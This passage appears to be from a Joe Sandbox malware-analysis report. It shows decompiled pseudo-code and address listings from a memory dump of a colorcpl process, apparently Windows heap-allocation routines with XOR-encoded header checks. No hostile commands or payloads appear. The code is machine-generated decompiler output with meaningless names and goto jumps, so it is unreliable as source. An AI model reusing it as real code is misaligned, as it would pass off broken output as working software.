                                                                                                				if(E06E3B477(__ecx,  &_v16) == 0) {
                                                                                                					__eflags =  *(__ecx + 0x40) & 0x00000002;
                                                                                                					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
                                                                                                						L32:
                                                                                                						__eflags =  *(_t218 + 0x40) & 0x00000080;
                                                                                                						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
                                                                                                							_t210 = E06EBCB4F(_t218);
                                                                                                							__eflags = _t210;
                                                                                                							if(_t210 == 0) {
                                                                                                								goto L33;
                                                                                                							}
                                                                                                							__eflags = ( *_t210 & 0x0000ffff) - _t156;
                                                                                                							if(( *_t210 & 0x0000ffff) < _t156) {
                                                                                                								goto L33;
                                                                                                							}
                                                                                                							_t157 = _t210;
                                                                                                							goto L3;
                                                                                                						}
                                                                                                						L33:
                                                                                                						_t157 = 0;
                                                                                                						__eflags = _t210;
                                                                                                						if(_t210 != 0) {
                                                                                                							__eflags =  *(_t218 + 0x4c);
                                                                                                							if( *(_t218 + 0x4c) != 0) {
                                                                                                								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
                                                                                                								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
                                                                                                							}
                                                                                                						}
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					_v12 = _v12 & 0;
                                                                                                					_t158 = __edx + 0x2000;
                                                                                                					_t94 =  *((intOrPtr*)(__ecx + 0x64));
                                                                                                					__eflags = _t158 - _t94;
                                                                                                					if(_t158 > _t94) {
                                                                                                						_t94 = _t158;
                                                                                                					}
                                                                                                					__eflags =  *((char*)(_t218 + 0xda)) - 2;
                                                                                                					if( *((char*)(_t218 + 0xda)) != 2) {
                                                                                                						_t165 = 0;
                                                                                                					} else {
                                                                                                						_t165 =  *(_t218 + 0xd4);
                                                                                                					}
                                                                                                					__eflags = _t165;
                                                                                                					if(_t165 == 0) {
                                                                                                						__eflags = _t94 - 0x3f4000;
                                                                                                						if(_t94 >= 0x3f4000) {
                                                                                                							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
                                                                                                						}
                                                                                                					}
                                                                                                					_t96 = _t94 + 0x0000ffff & 0xffff0000;
                                                                                                					_v8 = _t96;
                                                                                                					__eflags = _t96 - 0xfd0000;
                                                                                                					if(_t96 >= 0xfd0000) {
                                                                                                						_v8 = 0xfd0000;
                                                                                                					}
                                                                                                					_t97 = E06E40678(_t218, 1);
                                                                                                					_push(_t97);
                                                                                                					_push(0x2000);
                                                                                                					_v28 = _t97;
                                                                                                					_push( &_v8);
                                                                                                					_push(0);
                                                                                                					_push( &_v12);
                                                                                                					_push(0xffffffff);
                                                                                                					_t168 = E06E59660();
                                                                                                					__eflags = _t168;
                                                                                                					if(_t168 < 0) {
                                                                                                						while(1) {
                                                                                                							_t101 = _v8;
                                                                                                							__eflags = _t101 - _t158;
                                                                                                							if(_t101 == _t158) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t147 = _t101 >> 1;
                                                                                                							_v8 = _t147;
                                                                                                							__eflags = _t147 - _t158;
                                                                                                							if(_t147 < _t158) {
                                                                                                								_v8 = _t158;
                                                                                                							}
                                                                                                							_push(_v28);
                                                                                                							_push(0x2000);
                                                                                                							_push( &_v8);
                                                                                                							_push(0);
                                                                                                							_push( &_v12);
                                                                                                							_push(0xffffffff);
                                                                                                							_t168 = E06E59660();
                                                                                                							__eflags = _t168;
                                                                                                							if(_t168 < 0) {
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								_t101 = _v8;
                                                                                                								break;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t168;
                                                                                                						if(_t168 >= 0) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
                                                                                                						goto L60;
                                                                                                					} else {
                                                                                                						_t101 = _v8;
                                                                                                						L12:
                                                                                                						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
                                                                                                						_t103 = _v24 + 0x1000;
                                                                                                						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
                                                                                                						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
                                                                                                							_t103 =  *((intOrPtr*)(_t218 + 0x68));
                                                                                                						}
                                                                                                						_push(_v28);
                                                                                                						_v20 = _t103;
                                                                                                						_push(0x1000);
                                                                                                						_push( &_v20);
                                                                                                						_push(0);
                                                                                                						_push( &_v12);
                                                                                                						_push(0xffffffff);
                                                                                                						_t159 = E06E59660();
                                                                                                						__eflags = _t159;
                                                                                                						if(_t159 < 0) {
                                                                                                							L59:
                                                                                                							E06E4174B( &_v12,  &_v8, 0x8000);
                                                                                                							L60:
                                                                                                							_t156 = _v24;
                                                                                                							goto L32;
                                                                                                						} else {
                                                                                                							_t114 = E06E4138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
                                                                                                							__eflags = _t114;
                                                                                                							if(_t114 == 0) {
                                                                                                								_t159 = 0xc0000017;
                                                                                                							}
                                                                                                							__eflags = _t159;
                                                                                                							if(_t159 < 0) {
                                                                                                								goto L59;
                                                                                                							} else {
                                                                                                								_t115 = E06E37D50();
                                                                                                								_t212 = 0x7ffe0380;
                                                                                                								__eflags = _t115;
                                                                                                								if(_t115 != 0) {
                                                                                                									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                								} else {
                                                                                                									_t118 = 0x7ffe0380;
                                                                                                								}
                                                                                                								__eflags =  *_t118;
                                                                                                								if( *_t118 != 0) {
                                                                                                									_t119 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t119 + 0x240) & 0x00000001;
                                                                                                									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
                                                                                                										E06ED138A(0x226, _t218, _v12, _v20, 4);
                                                                                                										__eflags = E06E37D50();
                                                                                                										if(__eflags != 0) {
                                                                                                											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                										}
                                                                                                										E06ED1582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
                                                                                                									}
                                                                                                								}
                                                                                                								_t120 = E06E37D50();
                                                                                                								_t213 = 0x7ffe038a;
                                                                                                								__eflags = _t120;
                                                                                                								if(_t120 != 0) {
                                                                                                									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                								} else {
                                                                                                									_t123 = 0x7ffe038a;
                                                                                                								}
                                                                                                								__eflags =  *_t123;
                                                                                                								if( *_t123 != 0) {
                                                                                                									__eflags = E06E37D50();
                                                                                                									if(__eflags != 0) {
                                                                                                										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                									}
                                                                                                									E06ED1582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
                                                                                                								}
                                                                                                								_t129 = E06E37D50();
                                                                                                								__eflags = _t129;
                                                                                                								if(_t129 != 0) {
                                                                                                									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                								} else {
                                                                                                									_t132 = 0x7ffe0388;
                                                                                                								}
                                                                                                								__eflags =  *_t132;
                                                                                                								if( *_t132 != 0) {
                                                                                                									E06ECFEC0(0x230, _t218, _v12, _v8);
                                                                                                								}
                                                                                                								__eflags =  *(_t218 + 0x4c);
                                                                                                								_t214 =  *(_v12 + 0x24);
                                                                                                								if( *(_t218 + 0x4c) != 0) {
                                                                                                									_t197 =  *(_t218 + 0x50) ^  *_t214;
                                                                                                									 *_t214 = _t197;
                                                                                                									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
                                                                                                									__eflags = _t197 >> 0x18 - _t175;
                                                                                                									if(__eflags != 0) {
                                                                                                										_push(_t175);
                                                                                                										E06ECFA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
                                                                                                									}
                                                                                                								}
                                                                                                								_t157 =  *(_v12 + 0x24);
                                                                                                								goto L3;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_v16 = _v16 >> 3;
                                                                                                					_t157 = E06E399BF(__ecx, _t87,  &_v16, 0);
                                                                                                					E06E3A830(__ecx, _t157, _v16);
                                                                                                					if( *(_t218 + 0x4c) != 0) {
                                                                                                						_t206 =  *(_t218 + 0x50) ^  *_t157;
                                                                                                						 *_t157 = _t206;
                                                                                                						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
                                                                                                						if(_t206 >> 0x18 != _t185) {
                                                                                                							_push(_t185);
                                                                                                							E06ECFA2B(_t157, _t218, _t157, 0, _t218, __eflags);
                                                                                                						}
                                                                                                					}
                                                                                                					L3:
                                                                                                					return _t157;
                                                                                                				}
                                                                                                			}






































                                                                                                0x06e3b46f
                                                                                                0x06e3b30a
                                                                                                0x06e3b30f
                                                                                                0x06e3b310
                                                                                                0x06e3b315
                                                                                                0x06e3b31b
                                                                                                0x06e3b31c
                                                                                                0x06e3b321
                                                                                                0x06e3b322
                                                                                                0x06e3b329
                                                                                                0x06e3b32b
                                                                                                0x06e3b32d
                                                                                                0x06e827c2
                                                                                                0x06e827c2
                                                                                                0x06e827c5
                                                                                                0x06e827c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e827c9
                                                                                                0x06e827cb
                                                                                                0x06e827ce
                                                                                                0x06e827d0
                                                                                                0x06e827d2
                                                                                                0x06e827d2
                                                                                                0x06e827d5
                                                                                                0x06e827db
                                                                                                0x06e827e0
                                                                                                0x06e827e1
                                                                                                0x06e827e6
                                                                                                0x06e827e7
                                                                                                0x06e827ee
                                                                                                0x06e827f0
                                                                                                0x06e827f2
                                                                                                0x00000000
                                                                                                0x06e827f4
                                                                                                0x06e827f4
                                                                                                0x00000000
                                                                                                0x06e827f4
                                                                                                0x06e827f2
                                                                                                0x06e827f7
                                                                                                0x06e827f9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e827ff
                                                                                                0x00000000
                                                                                                0x06e3b333
                                                                                                0x06e3b333
                                                                                                0x06e3b336
                                                                                                0x06e3b336
                                                                                                0x06e3b33c
                                                                                                0x06e3b341
                                                                                                0x06e3b344
                                                                                                0x06e3b44e
                                                                                                0x06e3b44e
                                                                                                0x06e3b34a
                                                                                                0x06e3b34d
                                                                                                0x06e3b353
                                                                                                0x06e3b358
                                                                                                0x06e3b359
                                                                                                0x06e3b35e
                                                                                                0x06e3b35f
                                                                                                0x06e3b366
                                                                                                0x06e3b368
                                                                                                0x06e3b36a
                                                                                                0x06e828f2
                                                                                                0x06e828fe
                                                                                                0x06e82903
                                                                                                0x06e82903
                                                                                                0x00000000
                                                                                                0x06e3b370
                                                                                                0x06e3b38c
                                                                                                0x06e3b391
                                                                                                0x06e3b393
                                                                                                0x06e8280a
                                                                                                0x06e8280a
                                                                                                0x06e3b399
                                                                                                0x06e3b39b
                                                                                                0x00000000
                                                                                                0x06e3b3a1
                                                                                                0x06e3b3a1
                                                                                                0x06e3b3a6
                                                                                                0x06e3b3b0
                                                                                                0x06e3b3b2
                                                                                                0x06e8281d
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3ba
                                                                                                0x06e3b3bd
                                                                                                0x06e82824
                                                                                                0x06e8282a
                                                                                                0x06e82831
                                                                                                0x06e82841
                                                                                                0x06e8284b
                                                                                                0x06e8284d
                                                                                                0x06e82858
                                                                                                0x06e82858
                                                                                                0x06e82858
                                                                                                0x06e82870
                                                                                                0x06e82870
                                                                                                0x06e82831
                                                                                                0x06e3b3c3
                                                                                                0x06e3b3c8
                                                                                                0x06e3b3d2
                                                                                                0x06e3b3d4
                                                                                                0x06e82883
                                                                                                0x06e3b3da
                                                                                                0x06e3b3da
                                                                                                0x06e3b3da
                                                                                                0x06e3b3dc
                                                                                                0x06e3b3df
                                                                                                0x06e8288f
                                                                                                0x06e82891
                                                                                                0x06e8289c
                                                                                                0x06e8289c
                                                                                                0x06e8289c
                                                                                                0x06e828b4
                                                                                                0x06e828b4
                                                                                                0x06e3b3e5
                                                                                                0x06e3b3ea
                                                                                                0x06e3b3ec
                                                                                                0x06e828c7
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f7
                                                                                                0x06e3b3fa
                                                                                                0x06e828d9
                                                                                                0x06e828d9
                                                                                                0x06e3b400
                                                                                                0x06e3b407
                                                                                                0x06e3b40a
                                                                                                0x06e3b40f
                                                                                                0x06e3b413
                                                                                                0x06e3b41f
                                                                                                0x06e3b424
                                                                                                0x06e3b426
                                                                                                0x06e828e3
                                                                                                0x06e828e8
                                                                                                0x06e828e8
                                                                                                0x06e3b426
                                                                                                0x06e3b42f
                                                                                                0x00000000
                                                                                                0x06e3b42f
                                                                                                0x06e3b39b
                                                                                                0x06e3b36a
                                                                                                0x06e3b264
                                                                                                0x06e3b264
                                                                                                0x06e3b279
                                                                                                0x06e3b27f
                                                                                                0x06e3b287
                                                                                                0x06e3b28c
                                                                                                0x06e3b290
                                                                                                0x06e3b29c
                                                                                                0x06e3b2a3
                                                                                                0x06e827a0
                                                                                                0x06e827a5
                                                                                                0x06e827a5
                                                                                                0x06e3b2a3
                                                                                                0x06e3b2a9
                                                                                                0x06e3b2b1
                                                                                                0x06e3b2b1

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                                                • Instruction ID: 128798741a4b7190567a2ff4d9dff8dc18c24c6b996a43fa705bf2db1c9db3d6
                                                                                                • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                                                • Instruction Fuzzy Hash: EAB1F431B007159FDB95DBA9C898BBEB7F9AF84304F102169E65AD7381D770DA01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E06E2849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                                                				void* _t136;
                                                                                                				signed int _t139;
                                                                                                				signed int _t141;
                                                                                                				signed int _t145;
                                                                                                				intOrPtr _t146;
                                                                                                				signed int _t149;
                                                                                                				signed int _t150;
                                                                                                				signed int _t161;
                                                                                                				signed int _t163;
                                                                                                				signed int _t165;
                                                                                                				signed int _t169;
                                                                                                				signed int _t171;
                                                                                                				signed int _t194;
                                                                                                				signed int _t200;
                                                                                                				void* _t201;
                                                                                                				signed int _t204;
                                                                                                				signed int _t206;
                                                                                                				signed int _t210;
                                                                                                				signed int _t214;
                                                                                                				signed int _t215;
                                                                                                				signed int _t218;
                                                                                                				void* _t221;
                                                                                                				signed int _t224;
                                                                                                				signed int _t226;
                                                                                                				intOrPtr _t228;
                                                                                                				signed int _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				void* _t237;
                                                                                                				void* _t238;
                                                                                                
                                                                                                				_t236 = __esi;
                                                                                                				_t235 = __edi;
                                                                                                				_t193 = __ebx;
                                                                                                				_push(0x70);
                                                                                                				_push(0x6eef9c0);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                                                				if( *0x6f07b04 == 0) {
                                                                                                					L4:
                                                                                                					goto L5;
                                                                                                				} else {
                                                                                                					_t136 = E06E2CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                                                					_t236 = 0;
                                                                                                					if(_t136 < 0) {
                                                                                                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                                                						_t193 =  *( *[fs:0x30] + 0x18);
                                                                                                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                                                						 *(_t237 - 0x68) = _t236;
                                                                                                						 *(_t237 - 0x6c) = _t236;
                                                                                                						_t235 = _t236;
                                                                                                						 *(_t237 - 0x60) = _t236;
                                                                                                						E06E32280( *[fs:0x30], 0x6f08550);
                                                                                                						_t139 =  *0x6f07b04; // 0x2
                                                                                                						__eflags = _t139 - 1;
                                                                                                						if(__eflags != 0) {
                                                                                                							_t200 = 0xc;
                                                                                                							_t201 = _t237 - 0x40;
                                                                                                							_t141 = E06E4F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                                                							 *(_t237 - 0x44) = _t141;
                                                                                                							__eflags = _t141;
                                                                                                							if(_t141 < 0) {
                                                                                                								L50:
                                                                                                								E06E2FFB0(_t193, _t235, 0x6f08550);
                                                                                                								L5:
                                                                                                								return E06E6D130(_t193, _t235, _t236);
                                                                                                							}
                                                                                                							_push(_t201);
                                                                                                							_t221 = 0x10;
                                                                                                							_t202 =  *(_t237 - 0x40);
                                                                                                							_t145 = E06E11C45( *(_t237 - 0x40), _t221);
                                                                                                							 *(_t237 - 0x44) = _t145;
                                                                                                							__eflags = _t145;
                                                                                                							if(_t145 < 0) {
                                                                                                								goto L50;
                                                                                                							}
                                                                                                							_t146 =  *0x6f07b9c; // 0x0
                                                                                                							_t235 = L06E34620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                                                							 *(_t237 - 0x60) = _t235;
                                                                                                							__eflags = _t235;
                                                                                                							if(_t235 == 0) {
                                                                                                								_t149 = 0xc0000017;
                                                                                                								 *(_t237 - 0x44) = 0xc0000017;
                                                                                                							} else {
                                                                                                								_t149 =  *(_t237 - 0x44);
                                                                                                							}
                                                                                                							__eflags = _t149;
                                                                                                							if(__eflags >= 0) {
                                                                                                								L8:
                                                                                                								 *(_t237 - 0x64) = _t235;
                                                                                                								_t150 =  *0x6f07b10; // 0x18
                                                                                                								 *(_t237 - 0x4c) = _t150;
                                                                                                								_t193 = E06E4A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
                                                                                                								 *(_t237 - 0x44) = _t193;
                                                                                                								__eflags = _t193;
                                                                                                								if(_t193 < 0) {
                                                                                                									L30:
                                                                                                									E06E2FFB0(_t193, _t235, 0x6f08550);
                                                                                                									__eflags = _t235 - _t237 - 0x38;
                                                                                                									if(_t235 != _t237 - 0x38) {
                                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                                										L06E377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                                                									} else {
                                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                                									}
                                                                                                									__eflags =  *(_t237 - 0x6c);
                                                                                                									if( *(_t237 - 0x6c) != 0) {
                                                                                                										L06E377F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                                                									}
                                                                                                									__eflags = _t193;
                                                                                                									if(_t193 >= 0) {
                                                                                                										goto L4;
                                                                                                									} else {
                                                                                                										goto L5;
                                                                                                									}
                                                                                                								}
                                                                                                								_t204 =  *0x6f07b04; // 0x2
                                                                                                								 *(_t235 + 8) = _t204;
                                                                                                								__eflags =  *((char*)(_t237 - 0x39));
                                                                                                								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                									 *(_t235 + 4) = 1;
                                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                                                									_t161 =  *0x6f07b10; // 0x18
                                                                                                									 *(_t237 - 0x4c) = _t161;
                                                                                                								} else {
                                                                                                									 *(_t235 + 4) = _t236;
                                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                                                								}
                                                                                                								 *((intOrPtr*)(_t237 - 0x54)) = E06E537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                                                								_t224 = _t236;
                                                                                                								 *(_t237 - 0x40) = _t236;
                                                                                                								 *(_t237 - 0x50) = _t236;
                                                                                                								while(1) {
                                                                                                									_t163 =  *(_t235 + 8);
                                                                                                									__eflags = _t224 - _t163;
                                                                                                									if(_t224 >= _t163) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t228 =  *0x6f07b9c; // 0x0
                                                                                                									_t214 = L06E34620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                                                									 *(_t237 - 0x78) = _t214;
                                                                                                									__eflags = _t214;
                                                                                                									if(_t214 == 0) {
                                                                                                										L52:
                                                                                                										_t193 = 0xc0000017;
                                                                                                										L19:
                                                                                                										 *(_t237 - 0x44) = _t193;
                                                                                                										L20:
                                                                                                										_t206 =  *(_t237 - 0x40);
                                                                                                										__eflags = _t206;
                                                                                                										if(_t206 == 0) {
                                                                                                											L26:
                                                                                                											__eflags = _t193;
                                                                                                											if(_t193 < 0) {
                                                                                                												E06E537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                													 *0x6f07b10 =  *0x6f07b10 - 8;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t169 =  *(_t237 - 0x68);
                                                                                                												__eflags = _t169;
                                                                                                												if(_t169 != 0) {
                                                                                                													 *0x6f07b04 =  *0x6f07b04 - _t169;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags = _t193;
                                                                                                											if(_t193 >= 0) {
                                                                                                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                                                											}
                                                                                                											goto L30;
                                                                                                										}
                                                                                                										_t226 = _t206 * 0xc;
                                                                                                										__eflags = _t226;
                                                                                                										_t194 =  *(_t237 - 0x48);
                                                                                                										do {
                                                                                                											 *(_t237 - 0x40) = _t206 - 1;
                                                                                                											_t226 = _t226 - 0xc;
                                                                                                											 *(_t237 - 0x4c) = _t226;
                                                                                                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                                                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                                                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                                                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                                                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                                                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                													__eflags =  *((char*)(_t237 - 0x39));
                                                                                                													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                														_t171 = _t210;
                                                                                                													} else {
                                                                                                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                                                														L06E377F0(_t194, _t236, _t210 - 8);
                                                                                                														_t171 =  *(_t237 - 0x50);
                                                                                                													}
                                                                                                													L48:
                                                                                                													L06E377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                                                													L46:
                                                                                                													_t206 =  *(_t237 - 0x40);
                                                                                                													_t226 =  *(_t237 - 0x4c);
                                                                                                													goto L24;
                                                                                                												}
                                                                                                												 *0x6f07b08 =  *0x6f07b08 + 1;
                                                                                                												goto L24;
                                                                                                											}
                                                                                                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                											__eflags = _t171;
                                                                                                											if(_t171 != 0) {
                                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                													goto L48;
                                                                                                												}
                                                                                                												E06E557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                                                												goto L46;
                                                                                                											}
                                                                                                											L24:
                                                                                                											__eflags = _t206;
                                                                                                										} while (_t206 != 0);
                                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                                										goto L26;
                                                                                                									}
                                                                                                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                                                									 *(_t237 - 0x7c) = _t232;
                                                                                                									 *(_t232 - 4) = _t214;
                                                                                                									 *(_t237 - 4) = _t236;
                                                                                                									E06E5F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                                                									_t238 = _t238 + 0xc;
                                                                                                									 *(_t237 - 4) = 0xfffffffe;
                                                                                                									_t215 =  *(_t237 - 0x48);
                                                                                                									__eflags = _t193;
                                                                                                									if(_t193 < 0) {
                                                                                                										L06E377F0(_t215, _t236,  *(_t237 - 0x78));
                                                                                                										goto L20;
                                                                                                									}
                                                                                                									__eflags =  *((char*)(_t237 - 0x39));
                                                                                                									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                										_t233 = E06E4A44B( *(_t237 - 0x4c));
                                                                                                										 *(_t237 - 0x50) = _t233;
                                                                                                										__eflags = _t233;
                                                                                                										if(_t233 == 0) {
                                                                                                											L06E377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                                                											goto L52;
                                                                                                										}
                                                                                                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                                                										L17:
                                                                                                										_t234 =  *(_t237 - 0x40);
                                                                                                										_t218 = _t234 * 0xc;
                                                                                                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                                                										 *(_t218 + _t235 + 0x10) = _t236;
                                                                                                										_t224 = _t234 + 1;
                                                                                                										 *(_t237 - 0x40) = _t224;
                                                                                                										 *(_t237 - 0x50) = _t224;
                                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                                										continue;
                                                                                                									}
                                                                                                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                                                									goto L17;
                                                                                                								}
                                                                                                								 *_t235 = _t236;
                                                                                                								_t165 = 0x10 + _t163 * 0xc;
                                                                                                								__eflags = _t165;
                                                                                                								_push(_t165);
                                                                                                								_push(_t235);
                                                                                                								_push(0x23);
                                                                                                								_push(0xffffffff);
                                                                                                								_t193 = E06E596C0();
                                                                                                								goto L19;
                                                                                                							} else {
                                                                                                								goto L50;
                                                                                                							}
                                                                                                						}
                                                                                                						_t235 = _t237 - 0x38;
                                                                                                						 *(_t237 - 0x60) = _t235;
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					goto L4;
                                                                                                				}
                                                                                                			}

































                                                                                                0x06e286b0
                                                                                                0x00000000
                                                                                                0x06e286b6
                                                                                                0x00000000
                                                                                                0x06e79be9
                                                                                                0x06e286b0
                                                                                                0x06e28544
                                                                                                0x06e2854a
                                                                                                0x06e2854d
                                                                                                0x06e28551
                                                                                                0x06e2876e
                                                                                                0x06e28778
                                                                                                0x06e2877b
                                                                                                0x06e28780
                                                                                                0x06e28557
                                                                                                0x06e28557
                                                                                                0x06e2855d
                                                                                                0x06e2855d
                                                                                                0x06e2856b
                                                                                                0x06e2856e
                                                                                                0x06e28570
                                                                                                0x06e28573
                                                                                                0x06e28576
                                                                                                0x06e28576
                                                                                                0x06e28579
                                                                                                0x06e2857b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e28581
                                                                                                0x06e285a0
                                                                                                0x06e285a2
                                                                                                0x06e285a5
                                                                                                0x06e285a7
                                                                                                0x06e79b1b
                                                                                                0x06e79b1b
                                                                                                0x06e2862e
                                                                                                0x06e2862e
                                                                                                0x06e28631
                                                                                                0x06e28631
                                                                                                0x06e28634
                                                                                                0x06e28636
                                                                                                0x06e28669
                                                                                                0x06e28669
                                                                                                0x06e2866b
                                                                                                0x06e79bbf
                                                                                                0x06e79bc4
                                                                                                0x06e79bc8
                                                                                                0x06e79bce
                                                                                                0x06e79bce
                                                                                                0x06e28671
                                                                                                0x06e28671
                                                                                                0x06e28674
                                                                                                0x06e28676
                                                                                                0x06e79bae
                                                                                                0x06e79bae
                                                                                                0x06e28676
                                                                                                0x06e2867c
                                                                                                0x06e2867e
                                                                                                0x06e28688
                                                                                                0x06e28688
                                                                                                0x00000000
                                                                                                0x06e2867e
                                                                                                0x06e28638
                                                                                                0x06e28638
                                                                                                0x06e2863b
                                                                                                0x06e2863e
                                                                                                0x06e2863f
                                                                                                0x06e28642
                                                                                                0x06e28645
                                                                                                0x06e28648
                                                                                                0x06e2864d
                                                                                                0x06e79b69
                                                                                                0x06e79b6e
                                                                                                0x06e79b7b
                                                                                                0x06e79b81
                                                                                                0x06e79b85
                                                                                                0x06e79b89
                                                                                                0x06e79ba7
                                                                                                0x06e79b8b
                                                                                                0x06e79b91
                                                                                                0x06e79b9a
                                                                                                0x06e79b9f
                                                                                                0x06e79b9f
                                                                                                0x06e28788
